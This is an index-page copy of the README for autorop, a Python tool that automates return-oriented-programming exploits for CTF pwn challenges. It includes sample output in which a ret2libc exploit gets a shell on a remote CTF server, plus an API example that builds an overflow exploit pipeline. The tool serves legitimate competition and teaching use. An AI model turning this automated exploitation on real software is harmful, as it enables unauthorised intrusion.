Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mariuszskon/autorop

Automated solver of classic CTF pwn challenges, with flexibility in mind.
https://github.com/mariuszskon/autorop

capture-the-flag ctf exploit hacktoberfest linux pwnable pwntools rop wargame

Last synced: 2 months ago
JSON representation

Automated solver of classic CTF pwn challenges, with flexibility in mind.

Host: GitHub
URL: https://github.com/mariuszskon/autorop
Owner: mariuszskon
License: mit
Created: 2020-09-27T12:06:38.000Z (over 4 years ago)
Default Branch: master
Last Pushed: 2022-04-03T09:35:36.000Z (almost 3 years ago)
Last Synced: 2024-07-30T21:01:19.314Z (5 months ago)
Topics: capture-the-flag, ctf, exploit, hacktoberfest, linux, pwnable, pwntools, rop, wargame
Language: Python
Homepage: https://autorop.readthedocs.io
Size: 232 KB
Stars: 51
Watchers: 2
Forks: 8
Open Issues: 5
Metadata Files:
- Readme: README.rst
- License: LICENSE

Awesome Lists containing this project

README

        autorop

=======

|docs| |Test status| |MIT license|

Automated solver of classic CTF pwn challenges, with flexibility in mind.

Official documentation can be found at `autorop.readthedocs.io `_.

Disclaimer

----------

Do not use this software for illegal purposes. This software is intended to be used in legal Capture the Flag competitions only.

Command line

------------

.. code-block:: text

    $ autorop

    Usage: autorop BINARY [HOST PORT]

.. code-block:: text

    $ autorop tests/bamboofox/ret2libc bamboofox.cs.nctu.edu.tw 11002

    [*] '/home/mariusz/Projects/autorop/tests/bamboofox/ret2libc'

        Arch:     i386-32-little

        RELRO:    Partial RELRO

        Stack:    No canary found

        NX:       NX enabled

        PIE:      No PIE (0x8048000)

    [*] Produced pipeline: Classic(Corefile(), OpenTarget(), Puts(False, ['__libc_start_main', 'puts']), Auto(), SystemBinSh())

    [*] Pipeline [1/5]: Corefile()

    [+] Starting local process 'tests/bamboofox/ret2libc': pid 18833

    [*] Process 'tests/bamboofox/ret2libc' stopped with exit code -11 (SIGSEGV) (pid 18833)

    ...

    [*] Switching to interactive mode

    Hello!

    The address of "/bin/sh" is 0x804a02c

    The address of function "puts" is 0xf7e43da0

    $ wc -c /home/ctf/flag

    57 /home/ctf/flag

API

---

Importing autorop automatically does a ``from pwn import *``, so you can use all of `pwntools' goodies `_.

Central to autorop's design is the `pipeline `_. Most functions take in a ``PwnState``, and pass it on to the next function with some attributes changed. ``Pipeline`` copies\* the ``PwnState`` between each function so mutations are safe. This allows great simplicity and flexibility.

See how the below example neatly manages to "downgrade" the problem from something unique, to something generic that the ``Classic`` pipeline can handle.

.. code-block:: python

    from autorop import *

    BIN = "./tests/tjctf_2020/stop"

    def send_letter_first(tube, data):

        # the binary expects us to choose a letter first, before it takes input unsafely

        tube.sendline("A")

        # send actual payload

        tube.sendline(data)

    # create a starting state

    s = PwnState(BIN, lambda: process(BIN))

    # set an overwriter function, if the buffer overflow input

    # is not available immediately

    s.overwriter = send_letter_first

    # use base classic pipeline, with printf for leaking

    pipeline = turnkey.Classic(leak=leak.Printf())

    result = pipeline(s)

    # switch to interactive shell which we got via the exploit

    result.target.interactive()

\* **Note**: Although most of the attributes are deep-copied, ``target`` and ``_elf`` are not.

.. |docs| image:: https://readthedocs.org/projects/autorop/badge/

    :target: https://autorop.readthedocs.io

.. |Test status| image:: https://github.com/mariuszskon/autorop/workflows/autorop%20test/badge.svg?branch=master

    :target: https://github.com/mariuszskon/autorop/actions?query=workflow%3A%22autorop+test%22+branch%3Amaster

.. |MIT license| image:: https://img.shields.io/badge/license-MIT-blue.svg

    :target: https://github.com/mariuszskon/autorop/blob/master/LICENSE

Install

-------

1. Install autorop itself. You might want to be in your `python virtual environment `_. After cloning, install with pip:

.. code-block:: text

    $ git clone https://github.com/mariuszskon/autorop && cd autorop && pip install .

2. Make sure corefiles are enabled and are plainly written to the right directory:

.. code-block:: text

    # sysctl -w kernel.core_pattern=core.%p

3. (Optional) Install `libc-database `_ into ``~/.libc-database`` (or your own location then edit ``state.libc_database_path``).

4. All done!